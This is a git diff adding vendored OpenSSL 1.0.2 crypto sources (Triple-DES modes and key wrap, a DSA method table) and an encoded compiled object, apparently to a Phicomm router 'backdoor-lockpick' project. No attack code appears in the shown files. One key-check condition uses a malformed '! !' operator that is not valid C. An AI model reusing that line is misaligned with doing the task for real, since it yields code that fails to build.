+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#ifndef OPENSSL_NO_DES
+# include <openssl/evp.h>
+# include <openssl/objects.h>
+# include "evp_locl.h"
+# include <openssl/des.h>
+# include <openssl/rand.h>
+
+/* Block use of implementations in FIPS mode */
+# undef EVP_CIPH_FLAG_FIPS
+# define EVP_CIPH_FLAG_FIPS      0
+
+typedef struct {
+    union {
+        double align;
+        DES_key_schedule ks[3];
+    } ks;
+    union {
+        void (*cbc) (const void *, void *, size_t, const void *, void *);
+    } stream;
+} DES_EDE_KEY;
+# define ks1 ks.ks[0]
+# define ks2 ks.ks[1]
+# define ks3 ks.ks[2]
+
+# if defined(AES_ASM) && (defined(__sparc) || defined(__sparc__))
+/* ---------^^^ this is not a typo, just a way to detect that
+ * assembler support was in general requested... */
+#  include "sparc_arch.h"
+
+extern unsigned int OPENSSL_sparcv9cap_P[];
+
+#  define SPARC_DES_CAPABLE       (OPENSSL_sparcv9cap_P[1] & CFR_DES)
+
+void des_t4_key_expand(const void *key, DES_key_schedule *ks);
+void des_t4_ede3_cbc_encrypt(const void *inp, void *out, size_t len,
+                             DES_key_schedule *ks, unsigned char iv[8]);
+void des_t4_ede3_cbc_decrypt(const void *inp, void *out, size_t len,
+                             DES_key_schedule *ks, unsigned char iv[8]);
+# endif
+
+static int des_ede_init_key(EVP_CIPHER_CTX *ctx, const unsigned char *key,
+                            const unsigned char *iv, int enc);
+
+static int des_ede3_init_key(EVP_CIPHER_CTX *ctx, const unsigned char *key,
+                             const unsigned char *iv, int enc);
+
+static int des3_ctrl(EVP_CIPHER_CTX *c, int type, int arg, void *ptr);
+
+# define data(ctx) ((DES_EDE_KEY *)(ctx)->cipher_data)
+
+/*
+ * Because of various casts and different args can't use
+ * IMPLEMENT_BLOCK_CIPHER
+ */
+
+static int des_ede_ecb_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                              const unsigned char *in, size_t inl)
+{
+    BLOCK_CIPHER_ecb_loop()
+        DES_ecb3_encrypt((const_DES_cblock *)(in + i),
+                         (DES_cblock *)(out + i),
+                         &data(ctx)->ks1, &data(ctx)->ks2,
+                         &data(ctx)->ks3, ctx->encrypt);
+    return 1;
+}
+
+static int des_ede_ofb_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                              const unsigned char *in, size_t inl)
+{
+    while (inl >= EVP_MAXCHUNK) {
+        DES_ede3_ofb64_encrypt(in, out, (long)EVP_MAXCHUNK,
+                               &data(ctx)->ks1, &data(ctx)->ks2,
+                               &data(ctx)->ks3, (DES_cblock *)ctx->iv,
+                               &ctx->num);
+        inl -= EVP_MAXCHUNK;
+        in += EVP_MAXCHUNK;
+        out += EVP_MAXCHUNK;
+    }
+    if (inl)
+        DES_ede3_ofb64_encrypt(in, out, (long)inl,
+                               &data(ctx)->ks1, &data(ctx)->ks2,
+                               &data(ctx)->ks3, (DES_cblock *)ctx->iv,
+                               &ctx->num);
+
+    return 1;
+}
+
+static int des_ede_cbc_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                              const unsigned char *in, size_t inl)
+{
+    DES_EDE_KEY *dat = data(ctx);
+
+# ifdef KSSL_DEBUG
+    {
+        int i;
+        fprintf(stderr, "des_ede_cbc_cipher(ctx=%p, buflen=%d)\n", ctx,
+                ctx->buf_len);
+        fprintf(stderr, "\t iv= ");
+        for (i = 0; i < 8; i++)
+            fprintf(stderr, "%02X", ctx->iv[i]);
+        fprintf(stderr, "\n");
+    }
+# endif                         /* KSSL_DEBUG */
+    if (dat->stream.cbc) {
+        (*dat->stream.cbc) (in, out, inl, &dat->ks, ctx->iv);
+        return 1;
+    }
+
+    while (inl >= EVP_MAXCHUNK) {
+        DES_ede3_cbc_encrypt(in, out, (long)EVP_MAXCHUNK,
+                             &dat->ks1, &dat->ks2, &dat->ks3,
+                             (DES_cblock *)ctx->iv, ctx->encrypt);
+        inl -= EVP_MAXCHUNK;
+        in += EVP_MAXCHUNK;
+        out += EVP_MAXCHUNK;
+    }
+    if (inl)
+        DES_ede3_cbc_encrypt(in, out, (long)inl,
+                             &dat->ks1, &dat->ks2, &dat->ks3,
+                             (DES_cblock *)ctx->iv, ctx->encrypt);
+    return 1;
+}
+
+static int des_ede_cfb64_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                                const unsigned char *in, size_t inl)
+{
+    while (inl >= EVP_MAXCHUNK) {
+        DES_ede3_cfb64_encrypt(in, out, (long)EVP_MAXCHUNK,
+                               &data(ctx)->ks1, &data(ctx)->ks2,
+                               &data(ctx)->ks3, (DES_cblock *)ctx->iv,
+                               &ctx->num, ctx->encrypt);
+        inl -= EVP_MAXCHUNK;
+        in += EVP_MAXCHUNK;
+        out += EVP_MAXCHUNK;
+    }
+    if (inl)
+        DES_ede3_cfb64_encrypt(in, out, (long)inl,
+                               &data(ctx)->ks1, &data(ctx)->ks2,
+                               &data(ctx)->ks3, (DES_cblock *)ctx->iv,
+                               &ctx->num, ctx->encrypt);
+    return 1;
+}
+
+/*
+ * Although we have a CFB-r implementation for 3-DES, it doesn't pack the
+ * right way, so wrap it here
+ */
+static int des_ede3_cfb1_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                                const unsigned char *in, size_t inl)
+{
+    size_t n;
+    unsigned char c[1], d[1];
+
+    for (n = 0; n < inl; ++n) {
+        c[0] = (in[n / 8] & (1 << (7 - n % 8))) ? 0x80 : 0;
+        DES_ede3_cfb_encrypt(c, d, 1, 1,
+                             &data(ctx)->ks1, &data(ctx)->ks2,
+                             &data(ctx)->ks3, (DES_cblock *)ctx->iv,
+                             ctx->encrypt);
+        out[n / 8] = (out[n / 8] & ~(0x80 >> (unsigned int)(n % 8)))
+            | ((d[0] & 0x80) >> (unsigned int)(n % 8));
+    }
+
+    return 1;
+}
+
+static int des_ede3_cfb8_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                                const unsigned char *in, size_t inl)
+{
+    while (inl >= EVP_MAXCHUNK) {
+        DES_ede3_cfb_encrypt(in, out, 8, (long)EVP_MAXCHUNK,
+                             &data(ctx)->ks1, &data(ctx)->ks2,
+                             &data(ctx)->ks3, (DES_cblock *)ctx->iv,
+                             ctx->encrypt);
+        inl -= EVP_MAXCHUNK;
+        in += EVP_MAXCHUNK;
+        out += EVP_MAXCHUNK;
+    }
+    if (inl)
+        DES_ede3_cfb_encrypt(in, out, 8, (long)inl,
+                             &data(ctx)->ks1, &data(ctx)->ks2,
+                             &data(ctx)->ks3, (DES_cblock *)ctx->iv,
+                             ctx->encrypt);
+    return 1;
+}
+
+BLOCK_CIPHER_defs(des_ede, DES_EDE_KEY, NID_des_ede, 8, 16, 8, 64,
+                  EVP_CIPH_RAND_KEY | EVP_CIPH_FLAG_DEFAULT_ASN1,
+                  des_ede_init_key, NULL, NULL, NULL, des3_ctrl)
+# define des_ede3_cfb64_cipher des_ede_cfb64_cipher
+# define des_ede3_ofb_cipher des_ede_ofb_cipher
+# define des_ede3_cbc_cipher des_ede_cbc_cipher
+# define des_ede3_ecb_cipher des_ede_ecb_cipher
+    BLOCK_CIPHER_defs(des_ede3, DES_EDE_KEY, NID_des_ede3, 8, 24, 8, 64,
+                  EVP_CIPH_RAND_KEY | EVP_CIPH_FLAG_FIPS |
+                  EVP_CIPH_FLAG_DEFAULT_ASN1, des_ede3_init_key, NULL, NULL, NULL,
+                  des3_ctrl)
+
+    BLOCK_CIPHER_def_cfb(des_ede3, DES_EDE_KEY, NID_des_ede3, 24, 8, 1,
+                     EVP_CIPH_RAND_KEY | EVP_CIPH_FLAG_FIPS |
+                     EVP_CIPH_FLAG_DEFAULT_ASN1, des_ede3_init_key, NULL, NULL,
+                     NULL, des3_ctrl)
+
+    BLOCK_CIPHER_def_cfb(des_ede3, DES_EDE_KEY, NID_des_ede3, 24, 8, 8,
+                     EVP_CIPH_RAND_KEY | EVP_CIPH_FLAG_FIPS |
+                     EVP_CIPH_FLAG_DEFAULT_ASN1, des_ede3_init_key, NULL, NULL,
+                     NULL, des3_ctrl)
+
+static int des_ede_init_key(EVP_CIPHER_CTX *ctx, const unsigned char *key,
+                            const unsigned char *iv, int enc)
+{
+    DES_cblock *deskey = (DES_cblock *)key;
+    DES_EDE_KEY *dat = data(ctx);
+
+    dat->stream.cbc = NULL;
+# if defined(SPARC_DES_CAPABLE)
+    if (SPARC_DES_CAPABLE) {
+        int mode = ctx->cipher->flags & EVP_CIPH_MODE;
+
+        if (mode == EVP_CIPH_CBC_MODE) {
+            des_t4_key_expand(&deskey[0], &dat->ks1);
+            des_t4_key_expand(&deskey[1], &dat->ks2);
+            memcpy(&dat->ks3, &dat->ks1, sizeof(dat->ks1));
+            dat->stream.cbc = enc ? des_t4_ede3_cbc_encrypt :
+                des_t4_ede3_cbc_decrypt;
+            return 1;
+        }
+    }
+# endif
+# ifdef EVP_CHECK_DES_KEY
+    if (DES_set_key_checked(&deskey[0], &dat->ks1)
+        ! !DES_set_key_checked(&deskey[1], &dat->ks2))
+        return 0;
+# else
+    DES_set_key_unchecked(&deskey[0], &dat->ks1);
+    DES_set_key_unchecked(&deskey[1], &dat->ks2);
+# endif
+    memcpy(&dat->ks3, &dat->ks1, sizeof(dat->ks1));
+    return 1;
+}
+
+static int des_ede3_init_key(EVP_CIPHER_CTX *ctx, const unsigned char *key,
+                             const unsigned char *iv, int enc)
+{
+    DES_cblock *deskey = (DES_cblock *)key;
+    DES_EDE_KEY *dat = data(ctx);
+
+# ifdef KSSL_DEBUG
+    {
+        int i;
+        fprintf(stderr, "des_ede3_init_key(ctx=%p)\n", ctx);
+        fprintf(stderr, "\tKEY= ");
+        for (i = 0; i < 24; i++)
+            fprintf(stderr, "%02X", key[i]);
+        fprintf(stderr, "\n");
+        if (iv) {
+            fprintf(stderr, "\t IV= ");
+            for (i = 0; i < 8; i++)
+                fprintf(stderr, "%02X", iv[i]);
+            fprintf(stderr, "\n");
+        }
+    }
+# endif                         /* KSSL_DEBUG */
+
+    dat->stream.cbc = NULL;
+# if defined(SPARC_DES_CAPABLE)
+    if (SPARC_DES_CAPABLE) {
+        int mode = ctx->cipher->flags & EVP_CIPH_MODE;
+
+        if (mode == EVP_CIPH_CBC_MODE) {
+            des_t4_key_expand(&deskey[0], &dat->ks1);
+            des_t4_key_expand(&deskey[1], &dat->ks2);
+            des_t4_key_expand(&deskey[2], &dat->ks3);
+            dat->stream.cbc = enc ? des_t4_ede3_cbc_encrypt :
+                des_t4_ede3_cbc_decrypt;
+            return 1;
+        }
+    }
+# endif
+# ifdef EVP_CHECK_DES_KEY
+    if (DES_set_key_checked(&deskey[0], &dat->ks1)
+        || DES_set_key_checked(&deskey[1], &dat->ks2)
+        || DES_set_key_checked(&deskey[2], &dat->ks3))
+        return 0;
+# else
+    DES_set_key_unchecked(&deskey[0], &dat->ks1);
+    DES_set_key_unchecked(&deskey[1], &dat->ks2);
+    DES_set_key_unchecked(&deskey[2], &dat->ks3);
+# endif
+    return 1;
+}
+
+static int des3_ctrl(EVP_CIPHER_CTX *c, int type, int arg, void *ptr)
+{
+
+    DES_cblock *deskey = ptr;
+
+    switch (type) {
+    case EVP_CTRL_RAND_KEY:
+        if (RAND_bytes(ptr, c->key_len) <= 0)
+            return 0;
+        DES_set_odd_parity(deskey);
+        if (c->key_len >= 16)
+            DES_set_odd_parity(deskey + 1);
+        if (c->key_len >= 24)
+            DES_set_odd_parity(deskey + 2);
+        return 1;
+
+    default:
+        return -1;
+    }
+}
+
+const EVP_CIPHER *EVP_des_ede(void)
+{
+    return &des_ede_ecb;
+}
+
+const EVP_CIPHER *EVP_des_ede3(void)
+{
+    return &des_ede3_ecb;
+}
+
+# ifndef OPENSSL_NO_SHA
+
+#  include <openssl/sha.h>
+
+static const unsigned char wrap_iv[8] =
+    { 0x4a, 0xdd, 0xa2, 0x2c, 0x79, 0xe8, 0x21, 0x05 };
+
+static int des_ede3_unwrap(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                           const unsigned char *in, size_t inl)
+{
+    unsigned char icv[8], iv[8], sha1tmp[SHA_DIGEST_LENGTH];
+    int rv = -1;
+    if (inl < 24)
+        return -1;
+    if (!out)
+        return inl - 16;
+    memcpy(ctx->iv, wrap_iv, 8);
+    /* Decrypt first block which will end up as icv */
+    des_ede_cbc_cipher(ctx, icv, in, 8);
+    /* Decrypt central blocks */
+    /*
+     * If decrypting in place move whole output along a block so the next
+     * des_ede_cbc_cipher is in place.
+     */
+    if (out == in) {
+        memmove(out, out + 8, inl - 8);
+        in -= 8;
+    }
+    des_ede_cbc_cipher(ctx, out, in + 8, inl - 16);
+    /* Decrypt final block which will be IV */
+    des_ede_cbc_cipher(ctx, iv, in + inl - 8, 8);
+    /* Reverse order of everything */
+    BUF_reverse(icv, NULL, 8);
+    BUF_reverse(out, NULL, inl - 16);
+    BUF_reverse(ctx->iv, iv, 8);
+    /* Decrypt again using new IV */
+    des_ede_cbc_cipher(ctx, out, out, inl - 16);
+    des_ede_cbc_cipher(ctx, icv, icv, 8);
+    /* Work out SHA1 hash of first portion */
+    SHA1(out, inl - 16, sha1tmp);
+
+    if (!CRYPTO_memcmp(sha1tmp, icv, 8))
+        rv = inl - 16;
+    OPENSSL_cleanse(icv, 8);
+    OPENSSL_cleanse(sha1tmp, SHA_DIGEST_LENGTH);
+    OPENSSL_cleanse(iv, 8);
+    OPENSSL_cleanse(ctx->iv, 8);
+    if (rv == -1)
+        OPENSSL_cleanse(out, inl - 16);
+
+    return rv;
+}
+
+static int des_ede3_wrap(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                         const unsigned char *in, size_t inl)
+{
+    unsigned char sha1tmp[SHA_DIGEST_LENGTH];
+    if (!out)
+        return inl + 16;
+    /* Copy input to output buffer + 8 so we have space for IV */
+    memmove(out + 8, in, inl);
+    /* Work out ICV */
+    SHA1(in, inl, sha1tmp);
+    memcpy(out + inl + 8, sha1tmp, 8);
+    OPENSSL_cleanse(sha1tmp, SHA_DIGEST_LENGTH);
+    /* Generate random IV */
+    RAND_bytes(ctx->iv, 8);
+    memcpy(out, ctx->iv, 8);
+    /* Encrypt everything after IV in place */
+    des_ede_cbc_cipher(ctx, out + 8, out + 8, inl + 8);
+    BUF_reverse(out, NULL, inl + 16);
+    memcpy(ctx->iv, wrap_iv, 8);
+    des_ede_cbc_cipher(ctx, out, out, inl + 16);
+    return inl + 16;
+}
+
+static int des_ede3_wrap_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                                const unsigned char *in, size_t inl)
+{
+    /*
+     * Sanity check input length: we typically only wrap keys so EVP_MAXCHUNK
+     * is more than will ever be needed. Also input length must be a multiple
+     * of 8 bits.
+     */
+    if (inl >= EVP_MAXCHUNK || inl % 8)
+        return -1;
+    if (ctx->encrypt)
+        return des_ede3_wrap(ctx, out, in, inl);
+    else
+        return des_ede3_unwrap(ctx, out, in, inl);
+}
+
+static const EVP_CIPHER des3_wrap = {
+    NID_id_smime_alg_CMS3DESwrap,
+    8, 24, 0,
+    EVP_CIPH_WRAP_MODE | EVP_CIPH_CUSTOM_IV | EVP_CIPH_FLAG_CUSTOM_CIPHER
+        | EVP_CIPH_FLAG_DEFAULT_ASN1,
+    des_ede3_init_key, des_ede3_wrap_cipher,
+    NULL,
+    sizeof(DES_EDE_KEY),
+    NULL, NULL, NULL, NULL
+};
+
+const EVP_CIPHER *EVP_des_ede3_wrap(void)
+{
+    return &des3_wrap;
+}
+
+# endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_des3.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_des3.o
new file mode 100644
index 0000000000000000000000000000000000000000..d6d86d726c8c75fdb05bd2bfd9b4fed21f1a5a7b
GIT binary patch
literal 10280
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_dsa.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_dsa.c
new file mode 100644
index 0000000..523993f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_dsa.c
@@ -0,0 +1,69 @@
+/* crypto/evp/e_dsa.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/evp.h>
+#include <openssl/objects.h>
+#include <openssl/x509.h>
+
+static EVP_PKEY_METHOD dss_method = {
+    DSA_sign,
+    DSA_verify,
+    {EVP_PKEY_DSA, EVP_PKEY_DSA2, EVP_PKEY_DSA3, NULL},
+};
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_idea.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_idea.c
new file mode 100644
index 0000000..cac72b3
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_idea.c
@@ -0,0 +1,119 @@
+/* crypto/evp/e_idea.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
